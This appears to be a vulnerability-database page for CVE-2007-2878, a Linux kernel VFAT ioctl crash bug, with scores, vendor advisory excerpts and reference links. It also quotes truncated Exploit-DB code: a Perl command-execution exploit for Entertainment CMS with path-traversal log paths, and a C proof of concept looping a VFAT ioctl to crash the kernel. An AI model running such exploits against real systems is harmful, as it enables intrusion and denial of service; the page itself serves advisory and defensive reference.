CVE-2007-2878
published 2007-05-29CVE-2007-2878: The VFAT compat ioctls in the Linux kernel before 2.6.21.2, when run on a 64-bit system, allow local users to corrupt a kernel_dirent struct and cause a denial…
PriorityP414medium4.9CVSS 2.0
AVLACLAuNCNINAC
EXPLOIT
EPSS
0.88%
54.6th percentile
The VFAT compat ioctls in the Linux kernel before 2.6.21.2, when run on a 64-bit system, allow local users to corrupt a kernel_dirent struct and cause a denial of service (system crash) via unknown vectors.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | — | — |
CVSS provenance
nvdv2.04.9MEDIUMAV:L/AC:L/Au:N/C:N/I:N/A:C
vendor_ubuntu7.8HIGH
vendor_redhat4.9MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2007-08-31·CVSS 4.9
CVE-2007-2525 [MEDIUM] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Linux kernel vulnerabilities
A flaw was discovered in the PPP over Ethernet implementation. Local
attackers could manipulate ioctls and cause kernel memory consumption
leading to a denial of service. (CVE-2007-2525)
An integer underflow was discovered in the cpuset filesystem. If mounted,
local attackers could obtain kernel memory using large file offsets while
reading the tasks file. This could disclose sensitive data. (CVE-2007-2875)
Vilmos Nebehaj discovered that the SCTP netfilter code did not correctly
validate certain states. A remote attacker could send a specially crafted
packet causing a denial of service. (CVE-2007-2876)
Luca Tettamanti discovered a flaw in the VFAT compat ioctls on 64-bit
systems. A local attacker could corrupt a
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2007-07-19·CVSS 7.8
CVE-2006-4623 [HIGH] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Linux kernel vulnerabilities
A flaw was discovered in dvb ULE decapsulation. A remote attacker could
send a specially crafted message and cause a denial of service.
(CVE-2006-4623)
The compat_sys_mount function allowed local users to cause a denial of
service when mounting a smbfs filesystem in compatibility mode.
(CVE-2006-7203)
The Omnikey CardMan 4040 driver (cm4040_cs) did not limit the size of
buffers passed to read() and write(). A local attacker could exploit
this to execute arbitrary code with kernel privileges. (CVE-2007-0005)
Due to an variable handling flaw in the ipv6_getsockopt_sticky()
function a local attacker could exploit the getsockopt() calls to read
arbitrary kernel memory. This could disclose sensitive data.
(CVE-2007-1
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2007-07-18·CVSS 4.0
CVE-2007-2242 [MEDIUM] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Linux kernel vulnerabilities
The compat_sys_mount function allowed local users to cause a denial of
service when mounting a smbfs filesystem in compatibility mode.
(CVE-2006-7203)
The Omnikey CardMan 4040 driver (cm4040_cs) did not limit the size of
buffers passed to read() and write(). A local attacker could exploit
this to execute arbitrary code with kernel privileges. (CVE-2007-0005)
Due to a variable handling flaw in the ipv6_getsockopt_sticky()
function a local attacker could exploit the getsockopt() calls to
read arbitrary kernel memory. This could disclose sensitive data.
(CVE-2007-1000)
Ilja van Sprundel discovered that Bluetooth setsockopt calls could leak
kernel memory contents via an uninitialized stack buffer. A local
attacker c
Red Hat
VFAT compat ioctls DoS on 64-bit
vendor_redhat·2007-05-08·CVSS 4.9
CVE-2007-2878 [MEDIUM] VFAT compat ioctls DoS on 64-bit
VFAT compat ioctls DoS on 64-bit
The VFAT compat ioctls in the Linux kernel before 2.6.21.2, when run on a 64-bit system, allow local users to corrupt a kernel_dirent struct and cause a denial of service (system crash) via unknown vectors.
Statement: This issue did not affect the versions of the Linux kernel as shipped with Red Hat Enterprise Linux 2.1 or 3.
GHSA
GHSA-6gjf-xqgg-vxr8: The VFAT compat ioctls in the Linux kernel before 2
ghsa_unreviewed·2022-05-01
CVE-2007-2878 [MEDIUM] GHSA-6gjf-xqgg-vxr8: The VFAT compat ioctls in the Linux kernel before 2
The VFAT compat ioctls in the Linux kernel before 2.6.21.2, when run on a 64-bit system, allow local users to corrupt a kernel_dirent struct and cause a denial of service (system crash) via unknown vectors.
No detection rules found.
Exploit-DB
Entertainment CMS - Local File Inclusion / Remote Command Execution
exploitdb·2007-07-24
CVE-2007-4008 Entertainment CMS - Local File Inclusion / Remote Command Execution
Entertainment CMS - Local File Inclusion / Remote Command Execution
---
#!/usr/bin/perl
#
# Entertainment CMS Remote Command Execution Exploit
# Download: http://rapidshare.com/files/39640099/enter-cms.rar
#
# Exploit: http://site.com/[path]/custom.php?pagename=[Local File Inclusion];
# Example: http://multimedia.mydlstore.net/custom.php?pagename=teeeeeeeeeeee
#
# RST WAS MOVED TO RSTZONE.ORG !
#
# Another bug: Entertainment CMS Admin Login Bypass => http://securityreason.com/securityalert/2878
#
# Coded by Kw3rLn from Romanian Security Team a.K.A http://RSTZONE.ORG
# Contact: [email protected]
#
use IO::Socket;
use LWP::Simple;
#ripped from rgod
@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/
Exploit-DB
Linux Kernel 2.6.x - VFat Compat IOCTLS Local Denial of Service
exploitdb·2007-05-24
CVE-2007-2878 Linux Kernel 2.6.x - VFat Compat IOCTLS Local Denial of Service
Linux Kernel 2.6.x - VFat Compat IOCTLS Local Denial of Service
---
/*
source: https://www.securityfocus.com/bid/24134/info
The Linux Kernel is prone to a denial-of-service vulnerability.
A local attacker can exploit this issue to cause the kernel to crash, effectively denying service to legitimate users.
*/
#include
#include
#include
#include
#include
#include
struct kernel_dirent {
long d_ino;
long d_off;
unsigned short d_reclen;
char d_name[256]; /* We must not include limits.h! */
};
#define VFAT_IOCTL_READDIR_BOTH _IOR('r', 1, struct kernel_dirent [2])
#define VFAT_IOCTL_READDIR_SHORT _IOR('r', 2, struct kernel_dirent [2])
int main(void)
{
int fd = open(".", O_RDONLY);
struct kernel_dirent de[2];
while (1) {
int i = ioctl(fd, VFAT_IOCTL_READDIR_BOTH, (long)de);
if (i == -1) br
http://osvdb.org/35926http://secunia.com/advisories/25505http://secunia.com/advisories/26133http://secunia.com/advisories/26139http://secunia.com/advisories/26760http://secunia.com/advisories/27436http://secunia.com/advisories/27747http://secunia.com/advisories/28626http://support.avaya.com/elmodocs2/security/ASA-2007-474.htmhttp://www.debian.org/security/2008/dsa-1479http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.21.2http://www.redhat.com/support/errata/RHSA-2007-0705.htmlhttp://www.redhat.com/support/errata/RHSA-2007-0939.htmlhttp://www.securityfocus.com/bid/24134http://www.ubuntu.com/usn/usn-486-1http://www.ubuntu.com/usn/usn-489-1http://www.ubuntu.com/usn/usn-510-1http://www.vupen.com/english/advisories/2007/2023https://exchange.xforce.ibmcloud.com/vulnerabilities/34669https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11674http://osvdb.org/35926http://secunia.com/advisories/25505http://secunia.com/advisories/26133http://secunia.com/advisories/26139http://secunia.com/advisories/26760http://secunia.com/advisories/27436http://secunia.com/advisories/27747http://secunia.com/advisories/28626http://support.avaya.com/elmodocs2/security/ASA-2007-474.htmhttp://www.debian.org/security/2008/dsa-1479http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.21.2http://www.redhat.com/support/errata/RHSA-2007-0705.htmlhttp://www.redhat.com/support/errata/RHSA-2007-0939.htmlhttp://www.securityfocus.com/bid/24134http://www.ubuntu.com/usn/usn-486-1http://www.ubuntu.com/usn/usn-489-1http://www.ubuntu.com/usn/usn-510-1http://www.vupen.com/english/advisories/2007/2023https://exchange.xforce.ibmcloud.com/vulnerabilities/34669https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11674
2007-05-29
Published